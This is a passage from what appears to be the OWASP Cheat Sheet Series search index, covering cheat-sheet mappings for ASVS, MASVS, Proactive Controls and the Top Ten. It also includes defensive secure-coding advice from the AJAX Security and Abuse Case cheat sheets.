"},{"location":"IndexASVS.html#v63-random-values","title":"V6.3 Random Values","text":"

None.

"},{"location":"IndexASVS.html#v64-secret-management","title":"V6.4 Secret Management","text":"

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v7-error-handling-and-logging-verification-requirements","title":"V7: Error Handling and Logging Verification Requirements","text":""},{"location":"IndexASVS.html#v71-log-content-requirements","title":"V7.1 Log Content Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v72-log-processing-requirements","title":"V7.2 Log Processing Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v73-log-protection-requirements","title":"V7.3 Log Protection Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v74-error-handling","title":"V7.4 Error Handling","text":"

Error Handling Cheat Sheet.

"},{"location":"IndexASVS.html#v8-data-protection-verification-requirements","title":"V8: Data Protection Verification Requirements","text":""},{"location":"IndexASVS.html#v81-general-data-protection","title":"V8.1 General Data Protection","text":"

None.

"},{"location":"IndexASVS.html#v82-client-side-data-protection","title":"V8.2 Client-side Data Protection","text":"

None.

"},{"location":"IndexASVS.html#v83-sensitive-private-data","title":"V8.3 Sensitive Private Data","text":"

None.

"},{"location":"IndexASVS.html#v9-communications-verification-requirements","title":"V9: Communications Verification Requirements","text":""},{"location":"IndexASVS.html#v91-communications-security-requirements","title":"V9.1 Communications Security Requirements","text":"

HTTP Strict Transport Security Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v92-server-communications-security-requirements","title":"V9.2 Server Communications Security Requirements","text":"

None.

"},{"location":"IndexASVS.html#v10-malicious-code-verification-requirements","title":"V10: Malicious Code Verification Requirements","text":""},{"location":"IndexASVS.html#v101-code-integrity-controls","title":"V10.1 Code Integrity Controls","text":"

Third Party Javascript Management Cheat Sheet.

"},{"location":"IndexASVS.html#v102-malicious-code-search","title":"V10.2 Malicious Code Search","text":"

None.

"},{"location":"IndexASVS.html#v103-deployed-application-integrity-controls","title":"V10.3 Deployed Application Integrity Controls","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v11-business-logic-verification-requirements","title":"V11: Business Logic Verification Requirements","text":""},{"location":"IndexASVS.html#v111-business-logic-security-requirements","title":"V11.1 Business Logic Security Requirements","text":"

Abuse Case Cheat Sheet.

"},{"location":"IndexASVS.html#v12-file-and-resources-verification-requirements","title":"V12: File and Resources Verification Requirements","text":""},{"location":"IndexASVS.html#v121-file-upload-requirements","title":"V12.1 File Upload Requirements","text":"

Protect File Upload Against Malicious File.

"},{"location":"IndexASVS.html#v122-file-integrity-requirements","title":"V12.2 File Integrity Requirements","text":"

Protect File Upload Against Malicious File.

Third Party Javascript Management Cheat Sheet.

"},{"location":"IndexASVS.html#v123-file-execution-requirements","title":"V12.3 File execution Requirements","text":"

None.

"},{"location":"IndexASVS.html#v124-file-storage-requirements","title":"V12.4 File Storage Requirements","text":"

None.

"},{"location":"IndexASVS.html#v125-file-download-requirements","title":"V12.5 File Download Requirements","text":"

None.

"},{"location":"IndexASVS.html#v126-ssrf-protection-requirements","title":"V12.6 SSRF Protection Requirements","text":"

Server Side Request Forgery Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"IndexASVS.html#v13-api-and-web-service-verification-requirements","title":"V13: API and Web Service Verification Requirements","text":""},{"location":"IndexASVS.html#v131-generic-web-service-security-verification-requirements","title":"V13.1 Generic Web Service Security Verification Requirements","text":"

Web Service Security Cheat Sheet.

Server Side Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v132-restful-web-service-verification-requirements","title":"V13.2 RESTful Web Service Verification Requirements","text":"

REST Assessment Cheat Sheet.

REST Security Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v133-soap-web-service-verification-requirements","title":"V13.3 SOAP Web Service Verification Requirements","text":"

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v134-graphql-and-other-web-service-data-layer-security-requirements","title":"V13.4 GraphQL and other Web Service Data Layer Security Requirements","text":"

None.

"},{"location":"IndexASVS.html#v14-configuration-verification-requirements","title":"V14: Configuration Verification Requirements","text":""},{"location":"IndexASVS.html#v141-build","title":"V14.1 Build","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v142-dependency","title":"V14.2 Dependency","text":"

Docker Security Cheat Sheet.

Vulnerable Dependency Management Cheat Sheet.

"},{"location":"IndexASVS.html#v143-unintended-security-disclosure-requirements","title":"V14.3 Unintended Security Disclosure Requirements","text":"

Error Handling Cheat Sheet.

"},{"location":"IndexASVS.html#v144-http-security-headers-requirements","title":"V14.4 HTTP Security Headers Requirements","text":"

Content Security Policy Cheat Sheet.

"},{"location":"IndexASVS.html#v145-validate-http-request-header-requirements","title":"V14.5 Validate HTTP Request Header Requirements","text":"

None.

"},{"location":"IndexMASVS.html","title":"MASVS Index","text":""},{"location":"IndexMASVS.html#table-of-contents","title":"Table of Contents","text":""},{"location":"IndexMASVS.html#objective","title":"Objective","text":"

The objective of this index is to help OWASP Mobile Application Security Verification Standard (MASVS) users clearly identify which cheat sheets are useful for each section during their usage of the MASVS.

This index is based on version 1.x.x of the MASVS.

"},{"location":"IndexMASVS.html#v1-architecture-design-and-threat-modeling-requirements","title":"V1: Architecture, Design and Threat Modeling Requirements","text":"

Threat Modeling Cheat Sheet.

Abuse Case Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

"},{"location":"IndexMASVS.html#v2-data-storage-and-privacy-requirements","title":"V2: Data Storage and Privacy Requirements","text":"

Password Storage Cheat Sheet.

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

Logging Cheat Sheet.

"},{"location":"IndexMASVS.html#v3-cryptography-requirements","title":"V3: Cryptography Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexMASVS.html#v4-authentication-and-session-management-requirements","title":"V4: Authentication and Session Management Requirements","text":"

Authentication Cheat Sheet.

Authorization Cheat Sheet.

Session Management Cheat Sheet.

Transaction Authorization Cheat Sheet.

Access Control Cheat Sheet.

JSON Web Token Cheat Sheet for Java.

Credential Stuffing Prevention Cheat Sheet.

"},{"location":"IndexMASVS.html#v5-network-communication-requirements","title":"V5: Network Communication Requirements","text":"

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

HTTP Strict Transport Security Cheat Sheet.

REST Security Cheat Sheet.

Web Service Security Cheat Sheet.

"},{"location":"IndexMASVS.html#v6-environmental-interaction-requirements","title":"V6: Environmental Interaction Requirements","text":"

None.

"},{"location":"IndexMASVS.html#v7-code-quality-and-build-setting-requirements","title":"V7: Code Quality and Build Setting Requirements","text":"

Vulnerable Dependency Management Cheat Sheet.

Error Handling Cheat Sheet.

Deserialization Cheat Sheet.

Logging Cheat Sheet.

Insecure Direct Object Reference Prevention Cheat Sheet.

Input Validation Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention Cheat Sheet in Java.

OS Command Injection Defense Cheat Sheet.

Query Parameterization Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexMASVS.html#v8-resiliency-against-reverse-engineering-requirements","title":"V8: Resiliency Against Reverse Engineering Requirements","text":"

None.

"},{"location":"IndexProactiveControls.html","title":"Proactive Controls Index","text":""},{"location":"IndexProactiveControls.html#objective","title":"Objective","text":"

This cheat sheet will help users of the OWASP Proactive Controls identify which cheat sheets map to each Proactive Controls item. This mapping is based on the OWASP Proactive Controls version 3.0 (2018).

"},{"location":"IndexProactiveControls.html#1-define-security-requirements","title":"1. Define Security Requirements","text":"

Abuse Case Cheat Sheet

Attack Surface Analysis Cheat Sheet

Threat Modeling Cheat Sheet

"},{"location":"IndexProactiveControls.html#2-leverage-security-frameworks-and-libraries","title":"2. Leverage Security Frameworks and Libraries","text":"

Clickjacking Defense Cheat Sheet

DotNet Security Cheat Sheet (A3 Cross Site Scripting)

PHP Configuration Cheat Sheet

Ruby on Rails Cheat Sheet (Tools)

Ruby on Rails Cheat Sheet (XSS)

Vulnerable Dependency Management Cheat Sheet

"},{"location":"IndexProactiveControls.html#3-secure-database-access","title":"3. Secure Database Access","text":"

DotNet Security Cheat Sheet (Data Access)

DotNet Security Cheat Sheet (A1 SQL Injection)

Query Parameterization Cheat Sheet

Ruby on Rails Cheat Sheet (SQL Injection)

SQL Injection Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#4-encode-and-escape-data","title":"4. Encode and Escape Data","text":"

AJAX Security Cheat Sheet (Client Side)

Cross Site Scripting Prevention Cheat Sheet

DOM based XSS Prevention Cheat Sheet

Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

LDAP Injection Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#5-validate-all-inputs","title":"5. Validate All Inputs","text":"

Bean Validation Cheat Sheet

Deserialization Cheat Sheet

DotNet Security Cheat Sheet (HTTP Validation and Encoding)

DotNet Security Cheat Sheet (A8 Cross site request forgery)

DotNet Security Cheat Sheet (A10 Unvalidated redirects and forwards)

Input Validation Cheat Sheet

Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

Mass Assignment Cheat Sheet

OS Command Injection Defense Cheat Sheet

File Upload Cheat Sheet

REST Security Cheat Sheet (Input Validation)

Ruby on Rails Cheat Sheet (Command Injection)

Ruby on Rails Cheat Sheet (Mass Assignment and Strong Parameters)

Unvalidated Redirects and Forwards Cheat Sheet

XML External Entity Prevention Cheat Sheet

Server Side Request Forgery Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#6-implement-digital-identity","title":"6. Implement Digital Identity","text":"

Authentication Cheat Sheet

Choosing and Using Security Questions Cheat Sheet

DotNet Security Cheat Sheet (Forms authentication)

DotNet Security Cheat Sheet (A2 Weak Account management)

Forgot Password Cheat Sheet

JAAS Cheat Sheet

JSON Web Token Cheat Sheet for Java

Password Storage Cheat Sheet

REST Security Cheat Sheet (JWT)

Ruby on Rails Cheat Sheet (Sessions)

Ruby on Rails Cheat Sheet (Authentication)

SAML Security Cheat Sheet

Session Management Cheat Sheet

"},{"location":"IndexProactiveControls.html#7-enforce-access-controls","title":"7. Enforce Access Controls","text":"

Access Control Cheat Sheet

Authorization Testing Automation

Credential Stuffing Prevention Cheat Sheet

Cross-Site_Request_Forgery_Prevention_Cheat_Sheet

DotNet Security Cheat Sheet (A4 Insecure Direct object references)

DotNet Security Cheat Sheet (A7 Missing function level access control)

REST Security Cheat Sheet (Access Control)

Ruby on Rails Cheat Sheet (Insecure Direct Object Reference or Forceful Browsing)

Ruby on Rails Cheat Sheet (CSRF)

Insecure Direct Object Reference Prevention Cheat Sheet

Transaction Authorization Cheat Sheet

"},{"location":"IndexProactiveControls.html#8-protect-data-everywhere","title":"8. Protect Data Everywhere","text":"

Cryptographic Storage Cheat Sheet

DotNet Security Cheat Sheet (Encryption)

DotNet Security Cheat Sheet (A6 Sensitive data exposure)

TLS Cipher String Cheat Sheet

Transport Layer Protection Cheat Sheet

Key Management Cheat Sheet

HTTP Strict Transport Security Cheat Sheet

Pinning Cheat Sheet

REST Security Cheat Sheet (HTTPS)

Ruby on Rails Cheat Sheet (Encryption)

User Privacy Protection Cheat Sheet

"},{"location":"IndexProactiveControls.html#9-implement-security-logging-and-monitoring","title":"9. Implement Security Logging and Monitoring","text":"

REST Security Cheat Sheet (Audit Logs)

Logging Cheat Sheet

"},{"location":"IndexProactiveControls.html#10-handle-all-errors-and-exceptions","title":"10. Handle All Errors and Exceptions","text":"

REST Security Cheat Sheet (Error Handling)

Error Handling Cheat Sheet

"},{"location":"IndexTopTen.html","title":"OWASP Top Ten 2021 : Related Cheat Sheets","text":"

The OWASP Top Ten is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.

This cheat sheet will help users of the OWASP Top Ten identify which cheat sheets map to each security category. This mapping is based on the OWASP Top Ten 2021 version.

"},{"location":"IndexTopTen.html#a012021-broken-access-control","title":"A01:2021 \u2013 Broken Access Control","text":""},{"location":"IndexTopTen.html#a022021-cryptographic-failures","title":"A02:2021 \u2013 Cryptographic Failures","text":""},{"location":"IndexTopTen.html#a032021-injection","title":"A03:2021 \u2013 Injection","text":""},{"location":"IndexTopTen.html#a042021-insecure-design","title":"A04:2021 \u2013 Insecure Design","text":""},{"location":"IndexTopTen.html#a052021-security-misconfiguration","title":"A05:2021 \u2013 Security Misconfiguration","text":""},{"location":"IndexTopTen.html#a062021-vulnerable-and-outdated-components","title":"A06:2021 \u2013 Vulnerable and Outdated Components","text":""},{"location":"IndexTopTen.html#a072021-identification-and-authentication-failures","title":"A07:2021 \u2013 Identification and Authentication Failures","text":""},{"location":"IndexTopTen.html#a082021-software-and-data-integrity-failures","title":"A08:2021 \u2013 Software and Data Integrity Failures","text":""},{"location":"IndexTopTen.html#a092021-security-logging-and-monitoring-failures","title":"A09:2021 \u2013 Security Logging and Monitoring Failures","text":""},{"location":"IndexTopTen.html#a102021-server-side-request-forgery-ssrf","title":"A10:2021 \u2013 Server-Side Request Forgery (SSRF)","text":""},{"location":"IndexTopTen.html#a112021-next-steps","title":"A11:2021 \u2013 Next Steps","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html","title":"AJAX Security Cheat Sheet","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This document will provide a starting point for AJAX security and will hopefully be updated and expanded reasonably often to provide more detailed information about specific frameworks and technologies.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#client-side-javascript","title":"Client Side (JavaScript)","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-innertext-instead-of-innerhtml","title":"Use .innerText instead of .innerHTML","text":"

The use of .innerText will prevent most XSS problems as it will automatically encode the text.
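A minimal illustration (element and userComment are hypothetical names standing for any DOM element and any untrusted string):

// Vulnerable: userComment is parsed as markup, so injected script can execute
element.innerHTML = userComment;

// Safer: userComment is treated as plain text
element.innerText = userComment;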

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-use-eval-new-function-or-other-code-evaluation-tools","title":"Don't use eval(), new Function() or other code evaluation tools","text":"

The eval() function is evil; never use it. Needing to use eval() usually indicates a problem in your design.
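For example, when handling JSON responses, a safe parser can be used instead (responseText is a hypothetical variable holding the raw response body):

// Dangerous: evaluates arbitrary code contained in the response
// const data = eval('(' + responseText + ')');

// Safe alternative for JSON payloads
const data = JSON.parse(responseText);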

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#canonicalize-data-to-consumer-read-encode-before-use","title":"Canonicalize data to consumer (read: encode before use)","text":"

When using data to build HTML, script, CSS, XML, JSON, etc., make sure you take into account how that data must be presented in a literal sense to keep its logical meaning.

Data should be properly encoded before being used in this manner to prevent injection-style issues, and to make sure the logical meaning is preserved.

Check out the OWASP Java Encoder Project.
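As a minimal JavaScript illustration of the idea (encodeForHtml is a hypothetical helper; in practice prefer a vetted encoding library for your platform, such as the OWASP Java Encoder mentioned above for Java):

// Encode untrusted data for an HTML context before using it to build markup
function encodeForHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

element.innerHTML = '<b>' + encodeForHtml(userInput) + '</b>';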

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-rely-on-client-logic-for-security","title":"Don't rely on client logic for security","text":"

Don't forget that the user controls the client-side logic. A number of browser plugins are available to set breakpoints, skip code, change values, etc. Never rely on client logic for security.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-rely-on-client-business-logic","title":"Don't rely on client business logic","text":"

Just like the security logic, make sure any interesting business rules/logic are duplicated on the server side, lest a user bypass needed logic and do something silly, or worse, costly.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-writing-serialization-code","title":"Avoid writing serialization code","text":"

This is hard and even a small mistake can cause large security issues. There are already a lot of frameworks to provide this functionality.

Take a look at the JSON page for links.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-building-xml-or-json-dynamically","title":"Avoid building XML or JSON dynamically","text":"

Just like building HTML or SQL by hand, you will cause XML injection bugs, so stay away from this, or at least use an encoding library or a safe JSON or XML library to make attributes and element data safe.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#never-transmit-secrets-to-the-client","title":"Never transmit secrets to the client","text":"

Anything the client knows the user will also know, so keep all that secret stuff on the server please.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-perform-encryption-in-client-side-code","title":"Don't perform encryption in client side code","text":"

Use TLS/SSL and encrypt on the server!

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-perform-security-impacting-logic-on-client-side","title":"Don't perform security impacting logic on client side","text":"

This is the overall one that gets me out of trouble in case I missed something :)

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#server-side","title":"Server Side","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-csrf-protection","title":"Use CSRF Protection","text":"

Take a look at the Cross-Site Request Forgery (CSRF) Prevention cheat sheet.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#protect-against-json-hijacking-for-older-browsers","title":"Protect against JSON Hijacking for Older Browsers","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#review-angularjs-json-hijacking-defense-mechanism","title":"Review AngularJS JSON Hijacking Defense Mechanism","text":"

See the JSON Vulnerability Protection section of the AngularJS documentation.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#always-return-json-with-an-object-on-the-outside","title":"Always return JSON with an Object on the outside","text":"

Always have the outside primitive be an object for JSON strings:

Exploitable:

[{\"object\": \"inside an array\"}]\n

Not exploitable:

{\"object\": \"not inside an array\"}\n

Also not exploitable:

{\"result\": [{\"object\": \"inside an array\"}]}\n
"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-writing-serialization-code-server-side","title":"Avoid writing serialization code Server Side","text":"

Remember ref vs. value types! Look for an existing library that has been reviewed.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#services-can-be-called-by-users-directly","title":"Services can be called by users directly","text":"

Even though you only expect your AJAX client-side code to call those services, users can call them directly too.

Make sure you validate inputs and treat them like they are under user control (because they are!).

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-building-xml-or-json-by-hand-use-the-framework","title":"Avoid building XML or JSON by hand, use the framework","text":"

Use the framework and be safe; do it by hand and have security issues.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-json-and-xml-schema-for-webservices","title":"Use JSON And XML Schema for Webservices","text":"

You need to use a third-party library to validate web services.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html","title":"Abuse Case Cheat Sheet","text":""},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Often, when the security level of an application is mentioned in requirements, the following kinds of expressions are encountered:

These security requirements are too generic, and thus useless for a development team...

In order to build a secure application, from a pragmatic point of view, it is important to identify the attacks which the application must defend against, according to its business and technical context.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#objective","title":"Objective","text":"

The objective of this cheat sheet is to provide an explanation of what an Abuse Case is, why abuse cases are important when considering the security of an application, and finally to provide a proposal for a pragmatic approach to building a list of abuse cases and tracking them for every feature planned for implementation as part of an application. The cheat sheet may be used for this purpose regardless of the project methodology used (waterfall or agile).

Important note about this Cheat Sheet:

The main objective is to provide a pragmatic approach in order to allow a company or a project team
to start building and handling the list of abuse cases and then customize the elements
proposed to its context/culture in order to, finally, build its own method.

This cheat sheet can be seen as a getting-started tutorial.
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#context-approach","title":"Context & approach","text":""},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#why-clearly-identify-the-attacks","title":"Why clearly identify the attacks","text":"

Clearly identifying the attacks against which the application must defend is essential in order to enable the following steps in a project or sprint:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#notion-of-abuse-case","title":"Notion of Abuse Case","text":"

In order to help build the list of attacks, the notion of Abuse Cases is helpful.

An Abuse Case can be defined as:

A way to use a feature that was not expected by the implementer,
allowing an attacker to influence the feature or outcome of use of
the feature based on the attacker action (or input).

Synopsis defines an Abuse Case like this:

Misuse and abuse cases describe how users misuse or exploit the weaknesses
of controls in software features to attack an application.

This can lead to tangible business impact when a direct attack against
business functionalities, which may bring in revenue or provide
positive user experience, are attacked.

Abuse cases can also be an effective way to drive security requirements
that lead to proper protection of these critical business use cases.

Synopsis source

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#how-to-define-the-list-of-abuse-cases","title":"How to define the list of Abuse Cases","text":"

There are many different ways to define the list of abuse cases for a feature (that can be mapped to a user story in agile projects).

The OWASP Open SAMM project proposes the following approach in Stream B of the Security Practice Requirements Driven Testing for Maturity Level 2:

Misuse and abuse cases describe unintended and malicious use scenarios of the application, describing how an attacker could do this. Create misuse and abuse cases to misuse or exploit the weaknesses of controls in software features to attack an application. Use abuse-case models for an application to serve as fuel for identification of concrete security tests that directly or indirectly exploit the abuse scenarios.

Abuse of functionality, sometimes referred to as a "business logic attack", depends on the design and implementation of application functions and features. An example is using a password reset flow to enumerate accounts. As part of business logic testing, identify the business rules that are important for the application and turn them into experiments to verify whether the application properly enforces the business rule. For example, on a stock trading application, is the attacker allowed to start a trade at the beginning of the day and lock in a price, hold the transaction open until the end of the day, then complete the sale if the stock price has risen or cancel if the price dropped?

Open SAMM source: Verification Requirement Driven Testing Stream B

Another way to build the list can be the following (more bottom-up and collaboratively oriented):

Hold a workshop that includes people with the following profiles:

During this workshop (duration will depend on the size of the feature list, but 4 hours is a good start) all business features that will be part of the project or the sprint will be processed. The output of the workshop will be a list of attacks (abuse cases) for all business features. All abuse cases will have a risk rating that allows for filtering and prioritization.

It is important to take into account both Technical and Business kinds of abuse cases and mark them accordingly.

Example:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#when-to-define-the-list-of-abuse-cases","title":"When to define the list of Abuse Cases","text":"

In agile projects, the definition workshop must be made after the meeting in which User Stories are included in a Sprint.

In waterfall projects, the definition workshop must be made when the business features to implement are identified and known by the business.

Whatever project methodology is used (agile or waterfall), the abuse cases selected to be addressed must become security requirements in each feature specification section (waterfall) or User Story acceptance criteria (agile) in order to allow additional cost/effort evaluation, and identification and implementation of the countermeasures.

Each abuse case must have a unique identifier in order to allow tracking throughout the whole project/sprint (details about this point will be given in the proposal section).

An example of unique ID format can be ABUSE_CASE_001.

The following figure provides an overview of the chaining of the different steps involved (from left to right):

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#proposal","title":"Proposal","text":"

The proposal will focus on the output of the workshop explained in the previous section.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-1-preparation-of-the-workshop","title":"Step 1: Preparation of the workshop","text":"

First, even if it seems obvious, the key business people must be sure to know, understand and be able to explain the business features that will be processed during the workshop.

Secondly, create a new Microsoft Excel file (you can also use Google Sheets or any other similar software) with the following sheets (or tabs):

This is the representation of each sheet along with an example of content that will be filled during the workshop:

FEATURES sheet:

| Feature unique ID | Feature name | Feature short description |
| --- | --- | --- |
| FEATURE_001 | DocumentUploadFeature | Allow user to upload a document along with a message |

COUNTERMEASURES sheet:

| Countermeasure unique ID | Countermeasure short description | Countermeasure help/hint |
| --- | --- | --- |
| DEFENSE_001 | Validate the uploaded file by loading it into a parser | Use advice from the OWASP Cheat Sheet about file upload |

ABUSE CASES sheet:

| Abuse case unique ID | Feature ID impacted | Abuse case's attack description | Attack referential ID (if applicable) | CVSS V3 risk rating (score) | CVSS V3 string | Kind of abuse case | Countermeasure ID applicable | Handling decision (To Address or Risk Accepted) |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| ABUSE_CASE_001 | FEATURE_001 | Upload Office file with malicious macro in charge of dropping a malware | CAPEC-17 | HIGH (7.7) | CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:H | Technical | DEFENSE_001 | To Address |
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-2-during-the-workshop","title":"Step 2: During the workshop","text":"

Use the spreadsheet to review all the features.

For each feature, follow this flow:

  1. Key business people explain the current feature from a business point of view.
  2. Penetration testers propose and explain a set of attacks that they can perform against the feature.
  3. For each attack proposed:

    1. Appsec proposes a countermeasure and a preferred set up location (infrastructure, network, code, design...).
    2. Technical people give feedback about the feasibility of the proposed countermeasure.
    3. Penetration testers use the CVSS v3 (or other standard) calculator to determine a risk rating. (ex: CVSS V3 calculator)
    4. Key risk people accept/increase/decrease the rating to arrive at a final rating that matches the real business impact for the company.
  4. Key Business, Risk and Technical people reach a consensus and filter the list of abuse cases for the current feature to keep the ones that must be addressed, and then flag them accordingly in the ABUSE CASES sheet (if a risk is accepted, add a comment to explain why).

  5. Move on to the next feature...

If the presence of penetration testers is not possible, then you can use the following references to identify the applicable attacks on your features:

Important note on attacks and countermeasure knowledge base(s):

With time and across projects, you will build your own dictionary of attacks and countermeasures
that are applicable to the kind of applications in your business domain.

This dictionary will speed up future workshops significantly.

To promote the creation of this dictionary, you can, at the end of the project/sprint, gather the list
of attacks and countermeasures identified in a central location (wiki, database, file...) that will be
used during the next workshop in combination with input from penetration testers.
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-3-after-the-workshop","title":"Step 3: After the workshop","text":"

The spreadsheet contains (at this stage) the list of all abuse cases that must be handled and, potentially (depending on the capacity) corresponding countermeasures.

Now, there are two remaining tasks:

  1. Key business people must update the specification of each feature (waterfall) or the User Story of each feature (agile) to include the associated abuse cases as Security Requirements (waterfall) or Acceptance Criteria (agile).
  2. Key technical people must evaluate the overhead in terms of cost/effort needed to implement the countermeasure.
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-4-during-implementation-abuse-cases-handling-tracking","title":"Step 4: During implementation - Abuse cases handling tracking","text":"

In order to track the handling of all the abuse cases, the following approach can be used:

If one or several abuse cases are handled at:

In this way, it becomes possible (via some minor scripting) to identify where abuse cases are addressed.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-5-during-implementation-abuse-cases-handling-validation","title":"Step 5: During implementation - Abuse cases handling validation","text":"

As abuse cases are defined, it is possible to put in place automated or manual validations to ensure that:

Validations can be of the following kinds:

Adding automated tests also allows teams to verify that countermeasures against the abuse cases remain effective/in place during a maintenance or bug-fixing phase of a project (to prevent accidental removal/disabling). It is also useful when a Continuous Delivery approach is used, to ensure that all abuse case protections are in place before opening access to the application.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#example-of-derivation-of-abuse-cases-as-user-stories","title":"Example of derivation of Abuse Cases as User Stories","text":"

The following section shows an example of deriving Abuse Cases as User Stories, here using the OWASP Top 10 as the input source.

Threat Oriented Personas:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a12017-injection","title":"A1:2017-Injection","text":"

Epic:

Almost any source of data can be an injection vector, environment variables, parameters, external and internal web services, and all types of users. Injection flaws occur when an attacker can send hostile data to an interpreter.

Abuse Case:

As an attacker, I will perform an injection attack (SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers, SMTP headers, expression languages, and ORM queries) against input fields of the User or API interfaces

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a22017-broken-authentication","title":"A2:2017-Broken Authentication","text":"

Epic:

Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force, and dictionary attack tools. Session management attacks are well understood, particularly in relation to unexpired session tokens.

Abuse Case:

As an attacker, I have access to hundreds of millions of valid username and password combinations for credential stuffing.

Abuse Case:

As an attacker, I have default administrative account lists, automated brute force, and dictionary attack tools I use against login areas of the application and support systems.

Abuse Case:

As an attacker, I manipulate session tokens using expired and fake tokens to gain access.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a32017-sensitive-data-exposure","title":"A3:2017-Sensitive Data Exposure","text":"

Epic:

Rather than directly attacking crypto, attackers steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user's client, e.g. browser. A manual attack is generally required. Previously retrieved password databases could be brute forced by Graphics Processing Units (GPUs).

Abuse Case:

As an attacker, I steal keys that were exposed in the application to get unauthorized access to the application or system.

Abuse Case:

As an attacker, I execute man-in-the-middle attacks to get access to traffic and leverage it to obtain sensitive data and possibly get unauthorized access to the application.

Abuse Case:

As an attacker, I steal clear text data off the server, while in transit, or from the user's client, e.g. browser to get unauthorized access to the application or system.

Abuse Case:

As an attacker, I find and target old or weak cryptographic algorithms by capturing traffic and breaking the encryption.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a42017-xml-external-entities-xxe","title":"A4:2017-XML External Entities (XXE)","text":"

Epic:

Attackers can exploit vulnerable XML processors if they can upload XML or include hostile content in an XML document, exploiting vulnerable code, dependencies or integrations.

Abuse Case:

As an attacker, I exploit vulnerable areas of the application where the user or system can upload XML to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.

Abuse Case:

As an attacker, I include hostile content in an XML document which is uploaded to the application or system to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.

Abuse Case:

